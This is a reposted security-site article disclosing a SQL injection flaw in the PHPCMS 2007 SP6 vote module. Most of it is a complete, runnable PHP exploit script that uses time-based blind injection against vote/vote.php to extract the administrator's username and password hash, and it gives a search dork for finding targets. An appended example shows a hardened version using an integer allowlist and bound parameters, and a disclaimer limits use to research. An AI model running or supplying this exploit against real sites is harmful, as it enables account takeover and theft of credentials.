PHPCMS 2007 SP6 vote module SQL injection vulnerability

admin, 2017-04-24 13:47:04, 188 views

Author: Ryat
Source: Wolvez forum (狼族论坛)

It has been a long time since I posted anything on the forum. Today is the Mid-Autumn full moon, so here is a small vulnerability :)

Vulnerable code:

vote/vote.php (line 22):

    $optionids = is_array($op) ? implode(',',$op) : $op;
    ...
    $db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number+1 WHERE optionid IN ($optionids) ");


The vulnerability is obvious, so there is not much to say: the request parameter op is concatenated straight into the IN (...) clause. Other places have similar problems, and interested readers can trace them themselves. Below is a PoC-style exploit [since this is blind injection, it is not very effective] :p
Code:

    #!/usr/bin/php
    <?php
    print_r('
    +---------------------------------------------------------------------------+
    Phpcms 2007 SP6 Blind SQL injection / admin credentials disclosure exploit
    by puret_t
    mail: puretot at gmail dot com
    team: http://www.wolvez.org
    dork: "Powered by Phpcms 2007"
    +---------------------------------------------------------------------------+
    ');
    /**
     * works regardless of php.ini settings
     */
    if ($argc < 3) {
        print_r('
    +---------------------------------------------------------------------------+
    Usage: php '.$argv[0].' host path
    host:      target server (ip/hostname)
    path:      path to phpcms
    Example:
    php '.$argv[0].' localhost /phpcms/
    +---------------------------------------------------------------------------+
    ');
        exit;
    }

    error_reporting(7);
    ini_set('max_execution_time', 0);

    $host = $argv[1];
    $path = $argv[2];

    $benchmark = 100000000;   // BENCHMARK() iterations used as the timing signal
    $timeout   = 10;          // seconds; a slower response means the guessed byte matched

    // first request: the broken query leaks the table prefix in the error page
    $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/ryat%23';
    $resp = send();
    preg_match('/([a-z0-9]+)_vote_option/', $resp, $pre);

    if ($pre) {
        echo "Plz Waiting...\n";
        /**
         * get admin password
         */
        $j = 1;
        $pass = '';

        $hash[0] = 0;                                     //null
        $hash = array_merge($hash, range(48, 57));        //numbers
        $hash = array_merge($hash, range(97, 102));       //a-f letters

        while (strlen($pass) < 32) {
            for ($i = 0; $i <= 255; $i ++) {
                if (in_array($i, $hash)) {
                    $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/password/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
                    send();
                    usleep(2000000);
                    $starttime = time();
                    send();
                    $endtime = time();
                    $difftime = $endtime - $starttime;
                    if ($difftime > $timeout) {
                        $pass .= chr($i);
                        echo chr($i);
                        break;
                    }
                }
                if ($i == 255) exit("\nExploit Failed!\n");
            }
            $j ++;
        }
        echo "\t";
        /**
         * get admin username
         */
        $j = 1;
        $user = '';

        while (strstr($user, chr(0)) === false) {
            for ($i = 0; $i <= 255; $i ++) {
                $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/username/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
                send();
                usleep(2000000);
                $starttime = time();
                send();
                $endtime = time();
                $difftime = $endtime - $starttime;
                if ($difftime > $timeout) {
                    $user .= chr($i);
                    echo chr($i);
                    break;
                }
                if ($i == 255) exit("\nExploit Failed!\n");
            }
            $j ++;
        }

        exit("Exploit Success!\nadmin:\t$user\nPassword(md5):\t$pass\n");
    } else exit("Exploit Failed!\n");

    // raw HTTP POST to vote/vote.php carrying $cmd as the form body
    function send() {
        global $host, $path, $cmd;

        $message  = "POST ".$path."vote/vote.php HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "CLIENT-IP: ".time()."\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;

        $fp = fsockopen($host, 80);
        fputs($fp, $message);

        $resp = '';

        while ($fp && !feof($fp))
            $resp .= fread($fp, 1024);

        return $resp;
    }
    ?>
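As an added example that is not part of the original post or of PHPCMS, the vulnerable pattern from vote/vote.php is placed next to a hardened version of the same update. The table and column names (vote_option, optionid, number) come from the query on the page; the in-memory SQLite table, the PDO handle standing in for PHPCMS's $db and TABLE_VOTE_OPTION, and the function names are assumptions. The hardened form allowlists option ids as plain decimal integers and binds each one as a separate parameter, so the probe string the page's PoC sends in op never reaches the SQL text.

```php
<?php
// Added example, not PHPCMS code. PDO/SQLite stands in for PHPCMS's $db object.

// Vulnerable form (same logic as vote/vote.php line 22): $op is interpolated as SQL text.
function vulnerable_update_sql($op): string {
    $optionids = is_array($op) ? implode(',', $op) : $op;
    return "UPDATE vote_option SET number = number+1 WHERE optionid IN ($optionids)";
}

// Hardened form: accept only positive decimal integers, bind each as a parameter.
function hardened_update(PDO $db, $op): int {
    $ids = is_array($op) ? $op : [$op];
    $clean = [];
    foreach ($ids as $id) {
        // nested arrays or objects in the request are rejected outright
        if (!is_string($id) && !is_int($id)) {
            throw new InvalidArgumentException('option id must be a scalar');
        }
        // strict allowlist: digits only, so ")" "/**/" "#" etc. can never pass
        if (!preg_match('/^[1-9][0-9]{0,9}$/', (string)$id)) {
            throw new InvalidArgumentException('invalid option id: ' . (string)$id);
        }
        $clean[] = (int)$id;
    }
    if (!$clean) {
        return 0;
    }
    // one placeholder per id; the query text is fixed, only values are bound
    $placeholders = implode(',', array_fill(0, count($clean), '?'));
    $stmt = $db->prepare(
        "UPDATE vote_option SET number = number+1 WHERE optionid IN ($placeholders)"
    );
    foreach ($clean as $k => $id) {
        $stmt->bindValue($k + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed in-memory table mirroring vote_option.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE vote_option (optionid INTEGER PRIMARY KEY, number INTEGER NOT NULL DEFAULT 0)');
$db->exec('INSERT INTO vote_option (optionid, number) VALUES (1,0),(2,0),(3,0)');

// Normal input (op[]=1&op[]=3) updates two rows.
echo "Normal: " . hardened_update($db, ['1', '3']) . " rows updated\n";

// The probe string from the page's PoC becomes SQL in the vulnerable form,
// but is rejected by the allowlist before any query is built in the hardened one.
$probe = '999999)/**/AND/**/ryat#';
echo "Vulnerable SQL would be: " . vulnerable_update_sql($probe) . "\n";
try {
    hardened_update($db, $probe);
} catch (InvalidArgumentException $e) {
    echo "Hardened: rejected (" . $e->getMessage() . ")\n";
}
```

Run with `php example.php` (requires the pdo_sqlite extension). The same pattern applies to PHPCMS's MySQL backend: the fix is not escaping the string, but refusing anything that is not an integer and keeping ids out of the query text entirely. Casting with intval() alone would also stop this injection, but the allowlist plus bound parameters fails closed for unexpected shapes (arrays of arrays, empty strings) as well.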

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For questions, contact us by e-mail (use a corporate or otherwise valid mailbox to avoid filtering; contact details on the home page).
Posted by admin on 2017-04-24 13:47:04. Reprints should keep this link (CN-SEC中文网, with thanks to the original author): https://cn-sec.com/archives/45539.html